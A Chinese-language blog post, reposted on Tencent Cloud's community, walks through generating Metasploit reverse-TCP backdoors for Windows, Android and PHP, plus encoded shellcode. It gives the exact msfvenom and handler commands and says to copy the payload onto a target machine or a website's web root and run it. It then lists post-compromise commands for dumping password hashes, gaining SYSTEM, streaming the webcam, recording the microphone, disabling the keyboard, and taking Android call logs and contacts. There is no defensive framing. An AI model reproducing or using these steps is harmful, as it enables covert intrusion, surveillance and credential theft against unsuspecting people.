前往小程序,Get更优阅读体验!
立即前往
文档建议反馈控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
发布
首页
学习
活动
专区
工具
TVP最新优惠活动
返回腾讯云官网
社区首页 >专栏 >通过Metasploit生成各种后门

通过Metasploit生成各种后门

作者头像
微软技术分享
发布2022-12-28 13:21:58
5750
发布2022-12-28 13:21:58

生成windows后门

1.首先生成后门

代码语言:javascript
复制
[root@localhost ~]# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.1.1 lport=6666 -f exe > ./lyshark.exe

2.进入Metasploit,执行以下操作

代码语言:javascript
复制

3.将我们的(lyshark.exe)拷贝到目标主机并运行

4.攻陷后常用查询命令

代码语言:javascript
复制
ps         #查看进程
migrate	    		#注入进程
run vnc	    		#查看远程桌面
cat	      		#查看文件
edit	      		#编辑文件
upload	    		#上传文件
download	    	#下载文件
rm	      		#删除文件
mkdir	    		#创建文件夹
rmdir	    		#删除文件夹
sessions -l	 #查看会话
backgroud	   #退出当前会话
 
enumdesktops	      	  #在线用户数
uictl disable keyboard	  #让键盘失效
uictl enable keyboard	    #恢复键盘	
record_mic -d 10	      #音频录制
webcam_stream	      	#开启摄像头
screenshot	        	#桌面抓图
sysinfo           		#系统信息查询
getsystem	        	#获取最高权限
hashdump	        	#密码hash

生成Android后门

1.首先生成后门

代码语言:javascript
复制
[root@localhost ~]# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=6666 R > ./lyshark.apk

2.进入Metasploit,执行以下操作

代码语言:javascript
复制
msf > use exploit/multi/handler 
msf exploit(multi/handler) > 

msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp 
payload => android/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.1
lhost => 192.168.1.1
msf exploit(multi/handler) > set lport 6666
lport => 6666
msf exploit(multi/handler) > exploit 

[-] Handler failed to bind to 192.168.1.1:6666:-  -
[*] Started reverse TCP handler on 0.0.0.0:6666

3.将我们的(lyshark.apk)拷贝到目标主机并运行

4.此时主机已经沦陷,查看一下系统吧

代码语言:javascript
复制
常用命令:
search                     #搜索 search -f *.jpg
download
webcam_stream -i 1/2       #打开前置或后置摄像头
check_root                 #检测root
dump_calllog               #下载电话记录
dump_contacts              #下载信息记录
geolocate                  #定位,需要下载谷歌地图

生成php后门

1.首先生成后门

代码语言:javascript
复制
[root@localhost ~]# msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.1.1 lport=6666 -f raw > ./lyshark.php

2.进入Metasploit,执行以下操作

代码语言:javascript
复制
msf > use exploit/multi/handler 
msf exploit(multi/handler) > 

msf exploit(multi/handler) > set payload php/meterpreter_reverse_tcp 
payload => php/meterpreter_reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.1.1
lhost => 192.168.1.1
msf exploit(multi/handler) > set lport 6666
lport => 6666
msf exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
msf exploit(multi/handler) > 
[-] Handler failed to bind to 192.168.1.1:6666:-  -
[*] Started reverse TCP handler on 0.0.0.0:6666

3.将我们的(lyshark.php)拷贝到目标网页根路径

生成shellcode

1.生成shell    <-e 使用编码 - i 编码次数>

代码语言:javascript
复制
[root@localhost ~]# msfvenom -p windows/meterpreter/reverse_tcp LPORT=6666 LHOST=192.168.1.1 -e x86/shikata_ga_nai -i 11 -f py > lyshark.py
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2018-06-04,如有侵权请联系 cloudcommunity@tencent.com 删除
php
shell

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

php
shell
评论
登录后参与评论
0 条评论
热度
最新
登录 后参与评论
推荐阅读
LV.
文章
0
获赞
0
领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2024 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号 | 京公网安备号11010802020287

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档

Copyright © 2013 - 2024 Tencent Cloud.

All Rights Reserved. 腾讯云 版权所有

登录 后参与评论